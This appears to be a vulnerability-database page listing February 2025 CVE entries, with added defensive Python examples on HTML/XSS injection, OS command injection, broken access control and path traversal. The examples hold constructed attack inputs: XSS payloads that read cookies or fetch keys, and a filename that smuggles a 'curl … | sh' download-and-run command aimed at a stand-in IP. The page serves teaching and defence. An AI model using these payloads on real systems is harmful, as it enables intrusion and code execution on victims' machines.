Vulnerabilities

To inform, warn and help professionals keep up with the latest security vulnerabilities in technology systems, we provide a Spanish-language database, open to anyone interested, that includes the latest documented and recognised vulnerabilities.

This repository, with over 75,000 records, is based on information from the NVD (National Vulnerability Database); under a partnership agreement, INCIBE translates the included information into Spanish.

Occasionally this list shows vulnerabilities that have not yet been translated, because entries are added while the INCIBE team is still translating them. Each vulnerability is identified by its CVE (Common Vulnerabilities and Exposures) identifier, the standard naming scheme for information-security vulnerabilities, so that information can be exchanged between different tools and databases.

Every vulnerability collected is linked to its information sources and to any patches or fixes provided by manufacturers and developers. Advanced searches are supported: results can be narrowed by criteria such as vulnerability type, manufacturer and impact level.

RSS feeds and newsletters provide daily notification of the latest vulnerabilities added to the repository. The list below is updated daily with the latest vulnerabilities.

CVE-2025-24966

Publication date:
04/02/2025
reNgine is an automated reconnaissance framework for web applications. HTML Injection occurs when an application improperly validates or sanitizes user inputs, allowing attackers to inject arbitrary HTML code. In this scenario, the vulnerability exists in the "Add Target" functionality of the application, where the Target Organization and Target Description fields accept HTML payloads. The injected HTML is rendered and executed in the target area, potentially leading to malicious actions. Exploitation of HTML Injection can compromise the application's integrity and user trust. Attackers can execute unauthorized actions, steal sensitive information, or trick users into performing harmful actions. The organization's reputation, customer trust, and regulatory compliance could be negatively affected. This issue affects all versions up to and including 2.2.0. Users are advised to monitor the project for future releases which address this issue. There are no known workarounds.
Severity CVSS v4.0: MEDIUM
Last modification:
04/02/2025

CVE-2025-24967

Publication date:
04/02/2025
reNgine is an automated reconnaissance framework for web applications. A stored cross-site scripting (XSS) vulnerability exists in the admin panel's user management functionality. An attacker can exploit this issue by injecting malicious payloads into the username field during user creation. This vulnerability allows unauthorized script execution whenever the admin views or interacts with the affected user entry, posing a significant risk to sensitive admin functionalities. This issue affects all versions up to and including 2.20. Users are advised to monitor the project for future releases which address this issue. There are no known workarounds.
Severity CVSS v4.0: HIGH
Last modification:
04/02/2025
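
Both reNgine entries above (CVE-2025-24966 and CVE-2025-24967) come down to the same defect: untrusted text is written into HTML without output encoding, so field content becomes markup. The following is an added example, not reNgine's code; the function names, the payloads and the `/admin/users/` link path are constructed for illustration. It shows the raw-interpolation pattern next to a version that encodes for the HTML element and URL contexts, and uses the standard-library HTML parser to audit which tags and event-handler attributes actually reach the browser.

```python
# Added example (not reNgine's code): output encoding for untrusted fields
# such as "Target Organization", "Target Description" or a username.
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed payloads of the kind the two advisories describe (not taken from them).
TARGET_ORG = 'Acme <img src=x onerror="alert(1)">'
TARGET_DESC = '</td><script>fetch("/api/keys")</script>'
USERNAME = '"><svg onload=alert(document.cookie)>'


def render_target_row_vulnerable(org: str, desc: str) -> str:
    # Raw interpolation: whatever the user typed becomes markup.
    return f"<tr><td>{org}</td><td>{desc}</td></tr>"


def render_target_row_safe(org: str, desc: str) -> str:
    # html.escape(quote=True) turns < > & " ' into entities, so the text stays
    # text inside element content. Encoding at output time is the fix;
    # filtering on input alone is bypassable and breaks legitimate values.
    return (
        f"<tr><td>{html.escape(org, quote=True)}</td>"
        f"<td>{html.escape(desc, quote=True)}</td></tr>"
    )


def render_user_link_safe(username: str) -> str:
    # Two contexts, two encoders: the path segment is percent-encoded (safe=""
    # also encodes "/"), the attribute value and visible text are HTML-encoded.
    # "/admin/users/" is an assumed path, not reNgine's route.
    href = "/admin/users/" + quote(username, safe="")
    return f'<a href="{html.escape(href, quote=True)}">{html.escape(username, quote=True)}</a>'


class _TagAudit(HTMLParser):
    """Collects start tags and on* attributes, i.e. what a browser would execute."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.event_attrs: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.event_attrs.extend(name for name, _ in attrs if name.startswith("on"))


def audit(rendered: str) -> tuple[list[str], list[str]]:
    """Return (tags, event-handler attributes) found in the rendered HTML."""
    parser = _TagAudit()
    parser.feed(rendered)
    parser.close()
    return parser.tags, parser.event_attrs


if __name__ == "__main__":
    print(audit(render_target_row_vulnerable(TARGET_ORG, TARGET_DESC)))
    print(audit(render_target_row_safe(TARGET_ORG, TARGET_DESC)))
    print(audit(render_user_link_safe(USERNAME)))
```

The audit deliberately parses the output rather than grepping for `<script`: an encoded payload still contains the string `onerror=`, but only a real start tag with a real attribute is something a browser would act on.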

CVE-2025-24968

Publication date:
04/02/2025
reNgine is an automated reconnaissance framework for web applications. An unrestricted project deletion vulnerability allows attackers with specific roles, such as `penetration_tester` or `auditor` to delete all projects in the system. This can lead to a complete system takeover by redirecting the attacker to the onboarding page, where they can add or modify users, including Sys Admins, and configure critical settings like API keys and user preferences. This issue affects all versions up to and including 2.20. Users are advised to monitor the project for future releases which address this issue. There are no known workarounds.
Severity CVSS v4.0: Pending analysis
Last modification:
04/02/2025

CVE-2025-0630

Publication date:
04/02/2025
Multiple Western Telematic (WTI) products contain a web interface that is vulnerable to a local file inclusion attack (LFI), where any authenticated user has privileged access to files on the device's filesystem.
Severity CVSS v4.0: MEDIUM
Last modification:
04/02/2025

CVE-2025-0509

Publication date:
04/02/2025
A security issue was found in Sparkle before version 2.6.4. An attacker can replace an existing signed update with another payload, bypassing Sparkle’s (Ed)DSA signing checks.
Severity CVSS v4.0: Pending analysis
Last modification:
17/02/2025

CVE-2025-24971

Publication date:
04/02/2025
DumbDrop is a stupid simple file upload application that provides an interface for dragging and dropping files. An OS Command Injection vulnerability was discovered in the DumbDrop application, `/upload/init` endpoint. This vulnerability could allow an attacker to execute arbitrary code remotely when the **Apprise Notification** feature is enabled. This issue has been addressed in commit `4ff8469d` and all users are advised to patch. There are no known workarounds for this vulnerability.
Severity CVSS v4.0: CRITICAL
Last modification:
04/02/2025

CVE-2025-25039

Publication date:
04/02/2025
A vulnerability in the web-based management interface of HPE Aruba Networking ClearPass Policy Manager (CPPM) allows remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system.
Severity CVSS v4.0: Pending analysis
Last modification:
28/03/2025
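
The DumbDrop entry (CVE-2025-24971) and the ClearPass entry (CVE-2025-25039) are both OS command injection: request data reaches a shell as part of a command string. The snippet below is an added example, not code from either project. It assumes, purely for illustration, that a notification is sent by spawning a command-line tool with the uploaded filename in the message (the page does not say how either product builds its command); `notify-cli`, the hook URL and the filename are constructed. It shows how a POSIX shell would split the resulting string into several statements, and contrasts that with an argv list plus an allowlisted filename.

```python
# Added example (not DumbDrop's or ClearPass's code): command injection via a
# shell string versus an argv list.
import re
import shlex
import subprocess
import sys

# Constructed malicious filename (not from the advisory). The quote closes the
# single-quoted argument and ";" starts a new shell statement.
EVIL_NAME = "report.pdf'; curl http://203.0.113.5/x | sh; echo '"
HOOK_URL = "https://hooks.example/notify"  # assumed placeholder


def notify_command_vulnerable(filename: str) -> str:
    # The pattern behind this bug class: a string built from request data and
    # handed to /bin/sh (shell=True, child_process.exec, system()).
    # Returned instead of executed so the example is safe to run.
    return f"notify-cli -b 'Uploaded {filename}' {HOOK_URL}"


def shell_statements(cmd: str) -> int:
    # Tokenise the way a POSIX shell would and count statement separators.
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return 1 + sum(1 for tok in lex if tok in (";", "|", "&&", "||", "&"))


FILENAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")


def is_safe_filename(filename: str) -> bool:
    # Allowlist as defence in depth: no quotes, spaces, slashes or leading dots.
    return FILENAME_RE.fullmatch(filename) is not None


def notify_safe(filename: str) -> str:
    # argv list, no shell: the filename is one argument however it is spelled.
    # sys.executable stands in for the real notifier binary; the child simply
    # echoes the argument it received so the caller can see it arrived intact.
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])", f"Uploaded {filename}", HOOK_URL]
    out = subprocess.run(argv, capture_output=True, text=True, check=True)
    return out.stdout.rstrip("\n")


if __name__ == "__main__":
    print(shell_statements(notify_command_vulnerable("report.pdf")))  # 1
    print(shell_statements(notify_command_vulnerable(EVIL_NAME)))     # 4
    print(notify_safe(EVIL_NAME))
```

The allowlist is secondary: the argv form is what removes the shell from the path, and it keeps working for filenames the allowlist would have to reject, such as names with spaces.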

CVE-2025-24373

Publication date:
04/02/2025
woocommerce-pdf-invoices-packing-slips is an extension which allows users to create, print & automatically email PDF invoices & packing slips for WooCommerce orders. This vulnerability allows unauthorized users to access any PDF document from a store if they: 1. Have access to a guest document link and 2. Replace the URL variable `my-account` with `bulk`. The issue occurs when: 1. The store's document access is set to "guest." and 2. The user is logged out. This vulnerability compromises the confidentiality of sensitive documents, affecting all stores using the plugin with the guest access option enabled. This issue has been addressed in version 4.0.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
Severity CVSS v4.0: MEDIUM
Last modification:
19/02/2025
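
The WooCommerce PDF Invoices entry (CVE-2025-24373) is broken access control: the URL variable (`my-account` versus `bulk`) selects the code path, and one path skips the check that binds a guest link to one document. The snippet below is an added example, not the plugin's code. It models a guest link as an HMAC token over the order id and shows a dispatcher whose `bulk` branch accepts any guest token without checking which order it was issued for, next to one where the decision is computed once from the caller's identity and the requested document regardless of route. The `Order` record, the route values and the secret key are constructed.

```python
# Added example (not the plugin's code): route-dependent versus
# route-independent authorization for per-order PDF documents.
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional

# Constructed server secret; in practice loaded from configuration.
SERVER_SECRET = b"example-secret-do-not-use"


@dataclass(frozen=True)
class Order:
    order_id: int
    customer_id: int


def guest_token(order_id: int) -> str:
    # The secret part of a "guest document link": bound to one order, unguessable.
    return hmac.new(SERVER_SECRET, f"order:{order_id}".encode(), hashlib.sha256).hexdigest()


def _token_valid_for(order: Order, token: Optional[str]) -> bool:
    return token is not None and hmac.compare_digest(token, guest_token(order.order_id))


def can_access_vulnerable(route: str, order: Order, user_id: Optional[int], token: Optional[str]) -> bool:
    # "my-account" checks ownership, or that the guest token matches this order.
    # "bulk" only checks that some guest token is present, so swapping the URL
    # variable turns one guest link into access to every order's document.
    if route == "my-account":
        if user_id is not None:
            return user_id == order.customer_id
        return _token_valid_for(order, token)
    if route == "bulk":
        return token is not None
    return False


def can_access_safe(route: str, order: Order, user_id: Optional[int], token: Optional[str],
                    is_admin: bool = False) -> bool:
    # The route only selects how the document is rendered. The decision is the
    # same on every route: admin, the order's own customer, or a token bound
    # to this exact order.
    if route not in ("my-account", "bulk"):
        return False
    if is_admin:
        return True
    if user_id is not None:
        return user_id == order.customer_id
    return _token_valid_for(order, token)


if __name__ == "__main__":
    mine, theirs = Order(1001, 7), Order(1002, 8)
    link = guest_token(mine.order_id)
    print(can_access_vulnerable("bulk", theirs, None, link))  # True: the bug
    print(can_access_safe("bulk", theirs, None, link))        # False
```

The same principle applies to the reNgine project-deletion entry above (CVE-2025-24968): the permission check belongs to the operation and the object, not to whichever screen or URL happened to reach it.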

CVE-2025-0451

Publication date:
04/02/2025
Inappropriate implementation in Extensions API in Google Chrome prior to 133.0.6943.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted Chrome Extension. (Chromium security severity: Medium)
Severity CVSS v4.0: Pending analysis
Last modification:
08/04/2025

CVE-2025-0445

Publication date:
04/02/2025
Use after free in V8 in Google Chrome prior to 133.0.6943.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
Severity CVSS v4.0: Pending analysis
Last modification:
08/04/2025

CVE-2025-0444

Publication date:
04/02/2025
Use after free in Skia in Google Chrome prior to 133.0.6943.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
Severity CVSS v4.0: Pending analysis
Last modification:
08/04/2025

CVE-2024-48019

Publication date:
04/02/2025
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Files or Directories Accessible to External Parties vulnerability in Apache Doris. Application administrators can read arbitrary files from the server filesystem through path traversal. Users are recommended to upgrade to version 2.1.8, 3.0.3 or later, which fixes the issue.
Severity CVSS v4.0: Pending analysis
Last modification:
07/02/2025
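
The Western Telematic (CVE-2025-0630) and Apache Doris (CVE-2024-48019) entries are both file reads that escape the directory the feature was meant to expose. The snippet below is an added example, not code from either product. It contrasts a naive join-and-open with a reader that resolves the requested path (following symlinks) and confirms it is still inside the allowed directory, and runs both against a constructed temporary directory; the layout, file names and contents are constructed.

```python
# Added example (not WTI's or Apache Doris's code): containing file reads to a
# base directory, including the symlink and absolute-path cases.
import tempfile
from pathlib import Path


class TraversalError(ValueError):
    """Requested path resolves outside the allowed directory."""


def naive_read(base_dir: str, requested: str) -> bytes:
    # The bug: join and open. "../" walks out of base_dir, and an absolute
    # path on the right-hand side of "/" replaces base_dir entirely.
    return (Path(base_dir) / requested).read_bytes()


def safe_read(base_dir: str, requested: str, max_bytes: int = 1 << 20) -> bytes:
    base = Path(base_dir).resolve(strict=True)
    # Resolve after joining: ".." components are collapsed against the real
    # directory tree and symlinks are followed, so a link inside base_dir that
    # points outside is rejected too, not just a literal "..".
    target = (base / requested).resolve()
    if target != base and base not in target.parents:
        raise TraversalError(requested)
    if not target.is_file():
        raise FileNotFoundError(requested)
    with target.open("rb") as fh:
        return fh.read(max_bytes)  # bounded read: no multi-GB log through the API


def demo() -> dict:
    """Build a constructed sandbox and record what each reader does."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp) / "export"
        base.mkdir()
        (base / "report.csv").write_bytes(b"id,amount\n1,10\n")
        secret = Path(tmp) / "secret.properties"
        secret.write_bytes(b"db.password=hunter2\n")
        try:
            (base / "link").symlink_to(secret)
            has_link = True
        except (OSError, NotImplementedError):
            has_link = False  # e.g. no symlink privilege on Windows

        results["naive ../secret.properties"] = naive_read(str(base), "../secret.properties")
        for requested in ("report.csv", "../secret.properties", "/etc/passwd", "link"):
            if requested == "link" and not has_link:
                results[requested] = "skipped"
                continue
            try:
                results[requested] = safe_read(str(base), requested)
            except TraversalError:
                results[requested] = "rejected"
    return results


if __name__ == "__main__":
    for request, outcome in demo().items():
        print(f"{request!r}: {outcome!r}")
```

Checking the resolved path rather than the request string is what makes the `link` case fail closed; a string-level filter for `..` would have let it through.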